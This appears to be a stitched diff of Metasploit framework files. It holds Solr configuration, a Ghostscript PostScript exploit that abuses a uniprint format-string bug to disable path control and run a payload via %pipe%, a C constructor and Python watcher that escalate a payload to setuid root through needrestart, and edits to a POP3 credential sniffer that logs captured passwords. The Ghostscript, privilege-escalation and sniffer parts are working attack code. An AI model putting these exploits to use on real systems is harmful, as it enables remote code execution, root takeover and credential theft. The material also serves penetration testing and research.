+    <dynamicField name="*_srpt"  type="location_rpt" indexed="true" stored="true"/>
+    <dynamicField name="*_dpf" type="delimited_payloads_float" indexed="true"  stored="true"/>
+    <dynamicField name="*_dpi" type="delimited_payloads_int" indexed="true"  stored="true"/>
+    <dynamicField name="*_dps" type="delimited_payloads_string" indexed="true"  stored="true"/>
+    <dynamicField name="attr_*" type="text_general" indexed="true" stored="true" multiValued="true"/>
+    <uniqueKey>id</uniqueKey>
+    <fieldType name="string" class="solr.StrField" sortMissingLast="true" docValues="true" />
+    <fieldType name="strings" class="solr.StrField" sortMissingLast="true" multiValued="true" docValues="true" />
+    <fieldType name="boolean" class="solr.BoolField" sortMissingLast="true"/>
+    <fieldType name="booleans" class="solr.BoolField" sortMissingLast="true" multiValued="true"/>
+    <fieldType name="pint" class="solr.IntPointField" docValues="true"/>
+    <fieldType name="pfloat" class="solr.FloatPointField" docValues="true"/>
+    <fieldType name="plong" class="solr.LongPointField" docValues="true"/>
+    <fieldType name="pdouble" class="solr.DoublePointField" docValues="true"/>
+    <fieldType name="pints" class="solr.IntPointField" docValues="true" multiValued="true"/>
+    <fieldType name="pfloats" class="solr.FloatPointField" docValues="true" multiValued="true"/>
+    <fieldType name="plongs" class="solr.LongPointField" docValues="true" multiValued="true"/>
+    <fieldType name="pdoubles" class="solr.DoublePointField" docValues="true" multiValued="true"/>
+    <fieldType name="random" class="solr.RandomSortField" indexed="true"/>
+    <fieldType name="ignored" stored="false" indexed="false" multiValued="true" class="solr.StrField" />
+    <fieldType name="pdate" class="solr.DatePointField" docValues="true"/>
+    <fieldType name="pdates" class="solr.DatePointField" docValues="true" multiValued="true"/>
+    <fieldType name="binary" class="solr.BinaryField"/>
+    <fieldType name="rank" class="solr.RankField"/>
+    <dynamicField name="*_ws" type="text_ws"  indexed="true"  stored="true"/>
+    <fieldType name="text_ws" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="text_general" class="solr.TextField" positionIncrementGap="100" multiValued="true">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_t_sort" type="text_gen_sort" indexed="true" stored="true" multiValued="false"/>
+    <dynamicField name="*_txt_sort" type="text_gen_sort" indexed="true" stored="true"/>
+    <fieldType name="text_gen_sort" class="solr.SortableTextField" positionIncrementGap="100" multiValued="true">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en" type="text_en"  indexed="true"  stored="true"/>
+    <fieldType name="text_en" class="solr.TextField" positionIncrementGap="100">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="lowercase"/>
+        <filter name="englishPossessive"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="lowercase"/>
+        <filter name="englishPossessive"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en_split" type="text_en_splitting"  indexed="true"  stored="true"/>
+    <fieldType name="text_en_splitting" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
+      <analyzer type="index">
+        <tokenizer name="whitespace"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="1" catenateNumbers="1" catenateAll="0" splitOnCaseChange="1"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+        <filter name="flattenGraph" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="0" catenateNumbers="0" catenateAll="0" splitOnCaseChange="1"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en_split_tight" type="text_en_splitting_tight"  indexed="true"  stored="true"/>
+    <fieldType name="text_en_splitting_tight" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
+      <analyzer type="index">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
+        <filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
+        <filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="englishMinimalStem"/>
+        <filter name="removeDuplicates"/>
+        <filter name="flattenGraph" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
+        <filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
+        <filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="englishMinimalStem"/>
+        <filter name="removeDuplicates"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_rev" type="text_general_rev"  indexed="true"  stored="true"/>
+    <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+        <filter name="reversedWildcard" withOriginal="true"
+                maxPosAsterisk="3" maxPosQuestion="2" maxFractionAsterisk="0.33"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_phon_en" type="phonetic_en"  indexed="true"  stored="true"/>
+    <fieldType name="phonetic_en" stored="false" indexed="true" class="solr.TextField" >
+      <analyzer>
+        <tokenizer name="standard"/>
+        <filter name="doubleMetaphone" inject="false"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_s_lower" type="lowercase"  indexed="true"  stored="true"/>
+    <fieldType name="lowercase" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="keyword"/>
+        <filter name="lowercase" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_descendent_path" type="descendent_path"  indexed="true"  stored="true"/>
+    <fieldType name="descendent_path" class="solr.TextField">
+      <analyzer type="index">
+        <tokenizer name="pathHierarchy" delimiter="/" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="keyword" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_ancestor_path" type="ancestor_path"  indexed="true"  stored="true"/>
+    <fieldType name="ancestor_path" class="solr.TextField">
+      <analyzer type="index">
+        <tokenizer name="keyword" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="pathHierarchy" delimiter="/" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_point" type="point"  indexed="true"  stored="true"/>
+    <fieldType name="point" class="solr.PointType" dimension="2" subFieldSuffix="_d"/>
+    <fieldType name="location" class="solr.LatLonPointSpatialField" docValues="true"/>
+    <fieldType name="location_rpt" class="solr.SpatialRecursivePrefixTreeFieldType"
+               geo="true" distErrPct="0.025" maxDistErr="0.001" distanceUnits="kilometers" />
+    <fieldType name="delimited_payloads_float" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="float"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="delimited_payloads_int" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="integer"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="delimited_payloads_string" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="identity"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_cjk" type="text_cjk"  indexed="true"  stored="true"/>
+    <fieldType name="text_cjk" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="standard"/>
+        <filter name="CJKWidth"/>
+        <filter name="lowercase"/>
+        <filter name="CJKBigram"/>
+      </analyzer>
+    </fieldType>
+</schema>
@@ -0,0 +1,262 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<config>
+  <luceneMatchVersion>9.0</luceneMatchVersion>
+  <dataDir>${solr.data.dir:}</dataDir>
+  <directoryFactory name="DirectoryFactory"
+                    class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
+  <codecFactory class="solr.SchemaCodecFactory"/>
+  <indexConfig>
+    <lockType>${solr.lock.type:native}</lockType>
+  </indexConfig>
+  <updateHandler class="solr.DirectUpdateHandler2">
+
+    <updateLog>
+      <str name="dir">${solr.ulog.dir:}</str>
+      <int name="numVersionBuckets">${solr.ulog.numVersionBuckets:65536}</int>
+    </updateLog>
+
+    <autoCommit>
+      <maxTime>${solr.autoCommit.maxTime:15000}</maxTime>
+      <openSearcher>false</openSearcher>
+    </autoCommit>
+
+    <autoSoftCommit>
+      <maxTime>${solr.autoSoftCommit.maxTime:-1}</maxTime>
+    </autoSoftCommit>
+
+  </updateHandler>
+
+  <query>
+
+    <maxBooleanClauses>${solr.max.booleanClauses:1024}</maxBooleanClauses>
+
+    <filterCache size="512"
+                 initialSize="512"
+                 autowarmCount="0"/>
+    <queryResultCache size="512"
+                      initialSize="512"
+                      autowarmCount="0"/>
+
+    <documentCache size="512"
+                   initialSize="512"
+                   autowarmCount="0"/>
+
+    <cache name="perSegFilter"
+           class="solr.CaffeineCache"
+           size="10"
+           initialSize="0"
+           autowarmCount="10"
+           regenerator="solr.NoOpRegenerator" />
+
+    <enableLazyFieldLoading>true</enableLazyFieldLoading>
+
+    <queryResultWindowSize>20</queryResultWindowSize>
+
+    <queryResultMaxDocsCached>200</queryResultMaxDocsCached>
+
+    <listener event="newSearcher" class="solr.QuerySenderListener">
+      <arr name="queries">
+      </arr>
+    </listener>
+    <listener event="firstSearcher" class="solr.QuerySenderListener">
+      <arr name="queries">
+      </arr>
+    </listener>
+
+    <useColdSearcher>false</useColdSearcher>
+
+  </query>
+
+    <circuitBreakers enabled="true">
+
+  </circuitBreakers>
+
+  <requestDispatcher>
+
+    <httpCaching never304="true" />
+  </requestDispatcher>
+
+  <requestHandler name="/select" class="solr.SearchHandler">
+    <lst name="defaults">
+      <str name="echoParams">explicit</str>
+      <int name="rows">10</int>
+    </lst>
+  </requestHandler>
+  <requestHandler name="/query" class="solr.SearchHandler">
+    <lst name="defaults">
+      <str name="echoParams">explicit</str>
+      <str name="wt">json</str>
+      <str name="indent">true</str>
+    </lst>
+  </requestHandler>
+  <initParams path="/update/**,/query,/select,/spell">
+    <lst name="defaults">
+      <str name="df">_text_</str>
+    </lst>
+  </initParams>
+  <searchComponent name="spellcheck" class="solr.SpellCheckComponent">
+    <str name="queryAnalyzerFieldType">text_general</str>
+    <lst name="spellchecker">
+      <str name="name">default</str>
+      <str name="field">_text_</str>
+      <str name="classname">solr.DirectSolrSpellChecker</str>
+      <str name="distanceMeasure">internal</str>
+      <float name="accuracy">0.5</float>
+      <int name="maxEdits">2</int>
+      <int name="minPrefix">1</int>
+      <int name="maxInspections">5</int>
+      <int name="minQueryLength">4</int>
+      <float name="maxQueryFrequency">0.01</float>
+    </lst>
+  </searchComponent>
+  <requestHandler name="/spell" class="solr.SearchHandler" startup="lazy">
+    <lst name="defaults">
+      <str name="spellcheck.dictionary">default</str>
+      <str name="spellcheck">on</str>
+      <str name="spellcheck.extendedResults">true</str>
+      <str name="spellcheck.count">10</str>
+      <str name="spellcheck.alternativeTermCount">5</str>
+      <str name="spellcheck.maxResultsForSuggest">5</str>
+      <str name="spellcheck.collate">true</str>
+      <str name="spellcheck.collateExtendedResults">true</str>
+      <str name="spellcheck.maxCollationTries">10</str>
+      <str name="spellcheck.maxCollations">5</str>
+    </lst>
+    <arr name="last-components">
+      <str>spellcheck</str>
+    </arr>
+  </requestHandler>
+  <searchComponent class="solr.HighlightComponent" name="highlight">
+    <highlighting>
+      <fragmenter name="gap"
+                  default="true"
+                  class="solr.highlight.GapFragmenter">
+        <lst name="defaults">
+          <int name="hl.fragsize">100</int>
+        </lst>
+      </fragmenter>
+
+      <fragmenter name="regex"
+                  class="solr.highlight.RegexFragmenter">
+        <lst name="defaults">
+          <int name="hl.fragsize">70</int>
+          <float name="hl.regex.slop">0.5</float>
+          <str name="hl.regex.pattern">[-\w ,/\n\&quot;&apos;]{20,200}</str>
+        </lst>
+      </fragmenter>
+      <formatter name="html"
+                 default="true"
+                 class="solr.highlight.HtmlFormatter">
+        <lst name="defaults">
+          <str name="hl.simple.pre"><![CDATA[<em>]]></str>
+          <str name="hl.simple.post"><![CDATA[</em>]]></str>
+        </lst>
+      </formatter>
+      <encoder name="html"
+               class="solr.highlight.HtmlEncoder" />
+
+      <fragListBuilder name="simple"
+                       class="solr.highlight.SimpleFragListBuilder"/>
+
+      <fragListBuilder name="single"
+                       class="solr.highlight.SingleFragListBuilder"/>
+
+      <fragListBuilder name="weighted"
+                       default="true"
+                       class="solr.highlight.WeightedFragListBuilder"/>
+
+      <fragmentsBuilder name="default"
+                        default="true"
+                        class="solr.highlight.ScoreOrderFragmentsBuilder">
+      </fragmentsBuilder>
+
+      <fragmentsBuilder name="colored"
+                        class="solr.highlight.ScoreOrderFragmentsBuilder">
+        <lst name="defaults">
+          <str name="hl.tag.pre"><![CDATA[
+               <b style="background:yellow">,<b style="background:lawgreen">,
+               <b style="background:aquamarine">,<b style="background:magenta">,
+               <b style="background:palegreen">,<b style="background:coral">,
+               <b style="background:wheat">,<b style="background:khaki">,
+               <b style="background:lime">,<b style="background:deepskyblue">]]></str>
+          <str name="hl.tag.post"><![CDATA[</b>]]></str>
+        </lst>
+      </fragmentsBuilder>
+
+      <boundaryScanner name="default"
+                       default="true"
+                       class="solr.highlight.SimpleBoundaryScanner">
+        <lst name="defaults">
+          <str name="hl.bs.maxScan">10</str>
+          <str name="hl.bs.chars">.,!? &#9;&#10;&#13;</str>
+        </lst>
+      </boundaryScanner>
+
+      <boundaryScanner name="breakIterator"
+                       class="solr.highlight.BreakIteratorBoundaryScanner">
+        <lst name="defaults">
+          <str name="hl.bs.type">WORD</str>
+          <str name="hl.bs.language">en</str>
+          <str name="hl.bs.country">US</str>
+        </lst>
+      </boundaryScanner>
+    </highlighting>
+  </searchComponent>
+
+  <updateProcessor class="solr.UUIDUpdateProcessorFactory" name="uuid"/>
+  <updateProcessor class="solr.RemoveBlankFieldUpdateProcessorFactory" name="remove-blank"/>
+  <updateProcessor class="solr.FieldNameMutatingUpdateProcessorFactory" name="field-name-mutating">
+    <str name="pattern">[^\w-\.]</str>
+    <str name="replacement">_</str>
+  </updateProcessor>
+  <updateProcessor class="solr.ParseBooleanFieldUpdateProcessorFactory" name="parse-boolean"/>
+  <updateProcessor class="solr.ParseLongFieldUpdateProcessorFactory" name="parse-long"/>
+  <updateProcessor class="solr.ParseDoubleFieldUpdateProcessorFactory" name="parse-double"/>
+  <updateProcessor class="solr.ParseDateFieldUpdateProcessorFactory" name="parse-date">
+    <arr name="format">
+      <str>yyyy-MM-dd['T'[HH:mm[:ss[.SSS]][z</str>
+      <str>yyyy-MM-dd['T'[HH:mm[:ss[,SSS]][z</str>
+      <str>yyyy-MM-dd HH:mm[:ss[.SSS]][z</str>
+      <str>yyyy-MM-dd HH:mm[:ss[,SSS]][z</str>
+      <str>[EEE, ]dd MMM yyyy HH:mm[:ss] z</str>
+      <str>EEEE, dd-MMM-yy HH:mm:ss z</str>
+      <str>EEE MMM ppd HH:mm:ss [z ]yyyy</str>
+    </arr>
+  </updateProcessor>
+  <updateProcessor class="solr.AddSchemaFieldsUpdateProcessorFactory" name="add-schema-fields">
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.String</str>
+      <str name="fieldType">text_general</str>
+      <lst name="copyField">
+        <str name="dest">*_str</str>
+        <int name="maxChars">256</int>
+      </lst>
+      <bool name="default">true</bool>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Boolean</str>
+      <str name="fieldType">booleans</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.util.Date</str>
+      <str name="fieldType">pdates</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Long</str>
+      <str name="valueClass">java.lang.Integer</str>
+      <str name="fieldType">plongs</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Number</str>
+      <str name="fieldType">pdoubles</str>
+    </lst>
+  </updateProcessor>
+
+  <updateRequestProcessorChain name="add-unknown-fields-to-the-schema" default="${update.autoCreateFields:true}"
+           processor="uuid,remove-blank,field-name-mutating,parse-boolean,parse-long,parse-double,parse-date,add-schema-fields">
+    <processor class="solr.LogUpdateProcessorFactory"/>
+    <processor class="solr.DistributedUpdateProcessorFactory"/>
+    <processor class="solr.RunUpdateProcessorFactory"/>
+  </updateRequestProcessorChain>
+
+</config>
@@ -0,0 +1,297 @@
+%!PS-Adobe-3.0 EPSF-3.0
+%%Pages: 1
+%%BoundingBox:   36   36  576  756
+%%LanguageLevel: 1
+%%EndComments
+%%BeginProlog
+%%EndProlog
+
+% Make sure to restore the original `setpagedevice` from userdict or systemdict
+% in case it has been redefined in another postscript file.
+% This happens with ImageMagick for example.
+userdict begin
+systemdict /setpagedevice known
+{
+        /setpagedevice systemdict /setpagedevice get def
+}
+if
+end
+
+% ====== Configuration ======
+
+% Offset of `gp_file *out` on the stack
+/IdxOutPtr MSF_IDXOUTPTR  def
+
+
+% ====== General Postscript utility functions ======
+
+% from: https://github.com/scriptituk/pslutils/blob/master/string.ps
+/cat {
+	exch
+	dup length 2 index length add string
+	dup dup 5 2 roll
+	copy length exch putinterval
+} bind def
+
+% from: https://rosettacode.org/wiki/Repeat_a_string#PostScript
+/times {
+  dup length dup    % rcount ostring olength olength
+  4 3 roll          % ostring olength olength rcount
+  mul dup string    % ostring olength flength fstring
+  4 1 roll          % fstring ostring olength flength
+  1 sub 0 3 1 roll  % fstring ostring 0 olength flength_minus_one 
+  {                 % fstring ostring iter
+    1 index 3 index % fstring ostring iter ostring fstring
+    3 1 roll        % fstring ostring fstring iter ostring
+    putinterval     % fstring ostring
+  } for
+  pop               % fstring
+} def
+
+% Printing helpers
+% /println { print (\012) print } bind def
+% /printnumln { =string cvs println } bind def
+
+% ====== Start of exploit helper code ======
+
+% Make a new tempfile but only save its path. This gives us a file path to read/write 
+% which will exist as long as this script runs. We don't actually use the file object
+% (hence `pop`) because we're passing the path to uniprint and reopening it ourselves.
+/PathTempFile () (w+) .tempfile pop def
+
+
+% Convert hex string "4142DEADBEEF" to padded little-endian byte string <EFBEADDE42410000>
+% <HexStr> str_ptr_to_le_bytes <ByteStringLE>
+/str_ptr_to_le_bytes {
+	% Convert hex string argument to Postscript string
+	% using <DEADBEEF> notation
+	/ArgBytes exch (<) exch (>) cat cat token pop exch pop def
+
+	% Prepare resulting string (`string` fills with zeros)
+	/Res 8 string def
+
+	% For every byte in the input
+	0 1 ArgBytes length 1 sub {
+		/i exch def
+
+		% put byte at index (len(ArgBytes) - 1 - i)
+		Res ArgBytes length 1 sub i sub ArgBytes i get put
+	} for
+
+	Res % return
+} bind def
+
+
+% <StackString> <FmtString> do_uniprint <LeakedData>
+/do_uniprint {
+	/FmtString exch def
+	/StackString exch def
+
+	% Select uniprint device with our payload
+	<<
+		/OutputFile PathTempFile
+		/OutputDevice /uniprint
+		/upColorModel /DeviceCMYKgenerate
+		/upRendering /FSCMYK32
+		/upOutputFormat /Pcl
+		/upOutputWidth 99999
+		/upWriteComponentCommands {(x)(x)(x)(x)} % This is required, just put bogus strings
+		/upYMoveCommand FmtString
+	>>
+	setpagedevice
+
+	% Manipulate the interpreter to put a recognizable piece of data on the stack
+	(%%__) StackString cat .runstring
+
+	% Produce a page with some content to trigger uniprint logic
+	newpath 1 1 moveto 1 2 lineto 1 setlinewidth stroke
+	showpage
+
+	% Read back the written data
+	/InFile PathTempFile (r) file def
+	/LeakedData InFile 4096 string readstring pop def
+	InFile closefile
+
+	LeakedData % return
+} bind def
+
+
+% get_index_of_controllable_stack <Idx>
+/get_index_of_controllable_stack {
+	% A recognizable token on the stack to search for
+	/SearchToken (ABABABAB) def
+
+	% Construct "1:%lx,2:%lx,3:%lx,...,400:%lx,"
+	/FmtString 0 string 1 1 400 { 3 string cvs (:%lx,) cat cat } for def
+
+	SearchToken FmtString do_uniprint
+
+	% Search for ABABABAB => 4241424142414241 (assume LE)
+	(4241424142414241) search {
+		exch pop
+		exch pop
+		% <pre> is left
+
+		% Search for latest comma in <pre> to get e.g. `123:` as <post>
+		(,) rsearch pop pop pop
+
+		% Search for colon and use <pre> to get `123`
+		(:) search pop exch pop exch pop
+
+		% return as int
+		cvi
+	} {
+		% (Could not find our data on the stack.. exiting) println
+		quit
+	} ifelse
+} bind def
+
+
+% <StackIdx> <AddrHex> write_to
+/write_to {
+	/AddrHex exch str_ptr_to_le_bytes def % address to write to
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (_%ln) cat def
+
+	AddrHex FmtString do_uniprint
+
+	pop % we don't care about formatted data
+} bind def
+
+
+% <StackIdx> read_ptr_at <PtrHexStr>
+/read_ptr_at {
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (__%lx__) cat def
+
+	() FmtString do_uniprint
+
+	(__) search pop pop pop (__) search pop exch pop exch pop
+} bind def
+
+
+% num_bytes <= 9
+% <StackIdx> <PtrHex> <NumBytes> read_dereferenced_bytes_at <ResultAsMultipliedInt>
+/read_dereferenced_bytes_at {
+	/NumBytes exch def
+	/PtrHex exch def
+	/PtrOct PtrHex str_ptr_to_le_bytes def % address to read from
+	/StackIdx exch def % stack idx to use
+
+	/FmtString StackIdx 1 sub (%x) times (__%.) NumBytes 1 string cvs cat (s__) cat cat def
+
+	PtrOct FmtString do_uniprint
+
+	/Data exch (__) search pop pop pop (__) search pop exch pop exch pop def
+
+	% Check if we were able to read all bytes
+	Data length NumBytes eq {
+		% Yes we did! So return the integer conversion of the bytes
+		0 % accumulator
+		NumBytes 1 sub -1 0 {
+			exch % <i> <accum>
+			256 mul exch % <accum*256> <i>
+			Data exch get % <accum*256> <Data[i]>
+			add % <accum*256 + Data[i]>
+		} for
+	} {
+		% We did not read all bytes, add a null byte and recurse on addr+1
+		StackIdx 1 PtrHex ptr_add_offset NumBytes 1 sub read_dereferenced_bytes_at
+		256 mul
+	} ifelse
+} bind def
+
+
+% <StackIdx> <AddrHex> read_dereferenced_ptr_at <PtrHexStr>
+/read_dereferenced_ptr_at {
+	% Read 6 bytes
+	6 read_dereferenced_bytes_at
+
+	% Convert to hex string and return
+	16 12 string cvrs
+} bind def
+
+
+% <Offset> <PtrHexStr> ptr_add_offset <PtrHexStr>
+/ptr_add_offset {
+	/PtrHexStr exch def % hex string pointer
+	/Offset exch def % integer to add
+
+	/PtrNum (16#) PtrHexStr cat cvi def
+
+	% base 16, string length 12
+	PtrNum Offset add 16 12 string cvrs
+} bind def
+
+
+% () println
+
+% ====== Start of exploit logic ======
+
+
+% Find out the index of the controllable bytes
+% This is around the 200-300 range but differs per binary/version
+/IdxStackControllable get_index_of_controllable_stack def
+% (Found controllable stack region at index: ) print IdxStackControllable printnumln
+
+% Exploit steps:
+% - `gp_file *out` is at stack index `IdxOutPtr`.
+%
+% - Controllable data is at index `IdxStackControllable`.
+%
+% - We want to find out the address of:
+%       out->memory->gs_lib_ctx->core->path_control_active
+%   hence we need to dereference and add ofsets a few times
+%
+% - Once we have the address of `path_control_active`, we use
+%   our write primitive to write an integer to its address - 3
+%   such that the most significant bytes (zeros) of that integer
+%   overwrite `path_control_active`, setting it to 0.
+%
+% - Finally, with `path_control_active` disabled, we can use
+%   the built-in (normally sandboxed) `%pipe%` functionality to
+%   run shell commands
+
+
+/PtrOut IdxOutPtr read_ptr_at def
+
+% (out: 0x) PtrOut cat println
+
+
+% memory is at offset 144 in out
+/PtrOutOffset 144 PtrOut ptr_add_offset def
+/PtrMem IdxStackControllable PtrOutOffset read_dereferenced_ptr_at def
+
+% (out->mem: 0x) PtrMem cat println
+
+% gs_lib_ctx is at offset 208 in memory
+/PtrMemOffset 208 PtrMem ptr_add_offset def
+/PtrGsLibCtx IdxStackControllable PtrMemOffset read_dereferenced_ptr_at def
+
+% (out->mem->gs_lib_ctx: 0x) PtrGsLibCtx cat println
+
+% core is at offset 8 in gs_lib_ctx
+/PtrGsLibCtxOffset 8 PtrGsLibCtx ptr_add_offset def
+/PtrCore IdxStackControllable PtrGsLibCtxOffset read_dereferenced_ptr_at def
+
+% (out->mem->gs_lib_ctx->core: 0x) PtrCore cat println
+
+% path_control_active is at offset 156 in core
+/PtrPathControlActive 156 PtrCore ptr_add_offset def
+
+% (out->mem->gs_lib_ctx->core->path_control_active: 0x) PtrPathControlActive cat println
+
+% Subtract a bit from the address to make sure we write a null over the field
+/PtrTarget -3 PtrPathControlActive ptr_add_offset def
+
+% And overwrite it!
+IdxStackControllable PtrTarget write_to
+
+
+% And now `path_control_active` == 0, so we can use %pipe%
+
+(%pipe%MSF_PAYLOAD) (r) file
+
+quit
@@ -0,0 +1,27 @@
+/*
+// system call
+#include <stdlib.h>
+// setuid, setgid
+#include <unistd.h>
+
+static void a() __attribute__((constructor));
+
+void a() {
+  setuid(0);
+  setgid(0);
+  const char *shell = "chown root:root PAYLOAD_PATH; chmod a+x PAYLOAD_PATH; chmod u+s PAYLOAD_PATH &";
+  system(shell);
+}
+*/
+
+extern int setuid(int);
+extern int setgid(int);
+extern int system(const char *__s);
+
+void a(void) __attribute__((constructor));
+
+void __attribute__((constructor)) a() {
+  setuid(0);
+  setgid(0);
+  system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
+}
@@ -0,0 +1,17 @@
+import os
+import time
+import pwd
+
+print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
+
+while True:
+    try:
+        file_stat = os.stat('PAYLOAD_PATH')
+    except FileNotFoundError:
+        exit()
+    username = pwd.getpwuid(file_stat.st_uid).pw_name
+    #print(f"Payload owned by: {username}. Stats: {file_stat}")
+    if (username == 'root'):
+        os.system('PAYLOAD_PATH &')
+        exit()
+    time.sleep(1)
@@ -553,7 +553,7 @@ void createStackWriteFormatString(
  formatBuffer+=result;
  bufferSize-=result;

-// Write the LABEL 6 more times, thus multiplying the the single
+// Write the LABEL 6 more times, thus multiplying the single
 // byte write pointer to an 8-byte aligned argv-list pointer and
 // update argv[0] to point to argv[1..n].
  writeCount=(((int)argvStackAddress)-(writeCount+56))&0xffff;
@@ -38,6 +38,10 @@ class SnifferPOP3 < BaseProtocolParser
          case s[:last]
            when nil
              # Its the first +OK must include the banner, worst case its just +OK
+
+              # Strip the banner, so that we don't need to do it multiple times
+              # We can improve the banner by removing the +OK part
+              s[:banner] = matches.strip
              s[:info]  = matches
              s[:proto] = "tcp"
              s[:name]  = "pop3"
@@ -62,7 +66,7 @@ class SnifferPOP3 < BaseProtocolParser
                :proof => s[:extra],
                :status => Metasploit::Model::Login::Status::SUCCESSFUL
              )
-              print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+              print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner]})")

              # Remove it form the session objects so freeup
              sessions.delete(s[:session])
@@ -91,7 +95,7 @@ class SnifferPOP3 < BaseProtocolParser
                :proof => s[:extra],
                :status => Metasploit::Model::Login::Status::INCORRECT
              )
-              print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+              print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner]})")
              s[:pass]=""
          end
        when nil
@@ -0,0 +1,188 @@
+[
+  {
+    "name": "v0.7.1",
